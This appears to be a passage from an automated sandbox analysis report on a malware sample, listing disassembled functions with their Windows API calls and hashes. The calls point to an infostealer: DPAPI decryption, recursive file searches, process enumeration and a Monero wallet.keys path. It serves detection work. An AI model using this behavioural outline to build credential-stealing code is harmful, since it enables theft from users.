                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0ug$K]w$QKw$YKw$k}kX$k}kX$sw
                                    • API String ID: 0-2124562420
                                    • Opcode ID: e769f482bfc800fbe53c7e76a644fbfe5a02b7d3cdb6269ae0e3fa6f5abef805
                                    • Instruction ID: 4def30583ec74039a98745f5d85000f9b90ced707eb875ef33ccc09cabb09dcc
                                    • Opcode Fuzzy Hash: e769f482bfc800fbe53c7e76a644fbfe5a02b7d3cdb6269ae0e3fa6f5abef805
                                    • Instruction Fuzzy Hash: D8B228F3608200AFE3046E2DEC8567ABBE9EFD4720F16893DE6C4C3744EA7558458697
                                    Function 00FEE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,01000D73), ref: 00FEE4A2
                                    • StrCmpCA.SHLWAPI(?,010014F8), ref: 00FEE4F2
                                    • StrCmpCA.SHLWAPI(?,010014FC), ref: 00FEE508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEEBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 1e3d1191bbb8145890f2206d758eddadf6a2c09296674b97f2c7904e4d365983
                                    • Instruction ID: fa9598afbf8b0e25ac0a59bd8f507104247ac0a2dc6215d6c4358d4fcaf4394c
                                    • Opcode Fuzzy Hash: 1e3d1191bbb8145890f2206d758eddadf6a2c09296674b97f2c7904e4d365983
                                    • Instruction Fuzzy Hash: EF1263B290011C9ADB24FB60DC96EFD7338AF54340F4041A9B60E961A5EF786F49DF92
                                    Function 013AFD4B Relevance: 9.2, Strings: 6, Instructions: 1657COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: D}w$H{yS$Tu~:$c_}$p1)n$fu
                                    • API String ID: 0-2308427907
                                    • Opcode ID: 104cf95ae210a9ffd288cad9f6d1a007be4a5ba1270017f06b98a05cd6055c7e
                                    • Instruction ID: 17f799724e9c5f7e138af8e215d51c8cf2f0ffb491c4ec391cf4ae773f58e72b
                                    • Opcode Fuzzy Hash: 104cf95ae210a9ffd288cad9f6d1a007be4a5ba1270017f06b98a05cd6055c7e
                                    • Instruction Fuzzy Hash: E0B218F360C2049FE308AE2DEC8567AB7E9EBD4720F1A4A3DE6C5C3744E93558058697
                                    Function 013AE262 Relevance: 9.1, Strings: 6, Instructions: 1628COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %WK$eEy$eEy$nrd?$u]9m$lW}
                                    • API String ID: 0-2403466954
                                    • Opcode ID: 59a9f4b427b452986b97afefb67e256e3333040f893e2d8982ffcaa581d6e29d
                                    • Instruction ID: c32bfa993eca8f9e823aed512897e94e78a6fe68e41ddf9bc1e1a141c4e6f29c
                                    • Opcode Fuzzy Hash: 59a9f4b427b452986b97afefb67e256e3333040f893e2d8982ffcaa581d6e29d
                                    • Instruction Fuzzy Hash: 02B20AF3A082109FE304AE2DDC8567AF7E9EF94720F16853DEAC4D7744EA3598058693
                                    Function 013B324A Relevance: 7.8, Strings: 5, Instructions: 1553COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ~>$ $M_w$Q_w$ZjWK
                                    • API String ID: 0-928244799
                                    • Opcode ID: 7a2dd42c8e3f28a0e488ca65a7e9ffc386e472542ad42725fea2187637395fea
                                    • Instruction ID: e3e4aca864a94e0b10f82454e0aad7f67d2888d250fd245e8c8cf82c2c9390d0
                                    • Opcode Fuzzy Hash: 7a2dd42c8e3f28a0e488ca65a7e9ffc386e472542ad42725fea2187637395fea
                                    • Instruction Fuzzy Hash: F4B2F3F390C2009FE304AF2DEC8567ABBE5EF94760F1A492DEAC597340EA3558418797
                                    Function 00FEC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FEC871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FEC87C
                                    • lstrcat.KERNEL32(?,01000B46), ref: 00FEC943
                                    • lstrcat.KERNEL32(?,01000B47), ref: 00FEC957
                                    • lstrcat.KERNEL32(?,01000B4E), ref: 00FEC978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: f4c82bd2f01822df53a593c4ad3aec4ee6b3be1c3a7ad23523fa4dc1f4be08c3
                                    • Instruction ID: 6ba9eb964b5ad8ffb1cf8a8622c1be086973b0707b4392e4173cfad5414decdb
                                    • Opcode Fuzzy Hash: f4c82bd2f01822df53a593c4ad3aec4ee6b3be1c3a7ad23523fa4dc1f4be08c3
                                    • Instruction Fuzzy Hash: 22415C7590420AAFDB20CFA0DC89BFEBBB8BB44344F1041A8F509A7285D7745A85DF91
                                    Function 00FE7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FE724D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FE7254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FE7281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00FE72A4
                                    • LocalFree.KERNEL32(?), ref: 00FE72AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: b8d46c22f1fe32e2f066cb7b839484ea61f74baabcefbb4a6c9067b752adc40d
                                    • Instruction ID: a8469e8d4fce69c09af71cfd3c314c9f3fd330f67df85e7d9c702d35f8c86855
                                    • Opcode Fuzzy Hash: b8d46c22f1fe32e2f066cb7b839484ea61f74baabcefbb4a6c9067b752adc40d
                                    • Instruction Fuzzy Hash: C6010CB5A40208BBEB24DF94DD4AF9E77B8AB44B00F104155FB05AB6C4D6B0AA008B65
                                    Function 00FF9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FF961E
                                    • Process32First.KERNEL32(01000ACA,00000128), ref: 00FF9632
                                    • Process32Next.KERNEL32(01000ACA,00000128), ref: 00FF9647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 00FF965C
                                    • CloseHandle.KERNEL32(01000ACA), ref: 00FF967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 718cf7804dc9240a9e4ef68fd41deb820ea73754af46242d39d3ed2854211129
                                    • Instruction ID: d666c858e2ee05c77bff0d735c42d8e40832bb491dfc7a840b0ade96c33586e6
                                    • Opcode Fuzzy Hash: 718cf7804dc9240a9e4ef68fd41deb820ea73754af46242d39d3ed2854211129
                                    • Instruction Fuzzy Hash: 5D01E975A04208ABCB24DFA5D958BEDB7F8AF48310F104198EA06E7640DBB49A44DF51
                                    Function 00FF8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,010005B7), ref: 00FF86CA
                                    • Process32First.KERNEL32(?,00000128), ref: 00FF86DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 00FF86F3
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • CloseHandle.KERNEL32(?), ref: 00FF8761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 4211160bf69f0c78807a003b0f27da81739c7c6d8264b547c99da0603ba2073b
                                    • Instruction ID: 546a2531f2c7bdf2f1b53127d6ffb3c5840643da6374d8022d2eb48b822db28a
                                    • Opcode Fuzzy Hash: 4211160bf69f0c78807a003b0f27da81739c7c6d8264b547c99da0603ba2073b
                                    • Instruction Fuzzy Hash: 8D316BB290121CABCB24EF50DC45FEEB778EF44740F1041A9F20EA66A0DB746A45DFA1
                                    Function 00FF8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00FE5184,40000001,00000000,00000000,?,00FE5184), ref: 00FF8EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: e86ca749f31a03cb5a4a58d486fa894e2105e7b6875311973779cd9a8f389602
                                    • Instruction ID: 806260c6da5324d2ebb83a9a9d26060d68376389ebf16d7491288499bbc6859e
                                    • Opcode Fuzzy Hash: e86ca749f31a03cb5a4a58d486fa894e2105e7b6875311973779cd9a8f389602
                                    • Instruction Fuzzy Hash: 69111C71200208BFDF10CFA4E889FBB33A9AF89750F109448FA158B650DB75EC42EB60
                                    Function 00FE9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FE4EEE,00000000,00000000), ref: 00FE9AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00FE4EEE,00000000,?), ref: 00FE9B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FE4EEE,00000000,00000000), ref: 00FE9B2A
                                    • LocalFree.KERNEL32(?,?,?,?,00FE4EEE,00000000,?), ref: 00FE9B3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
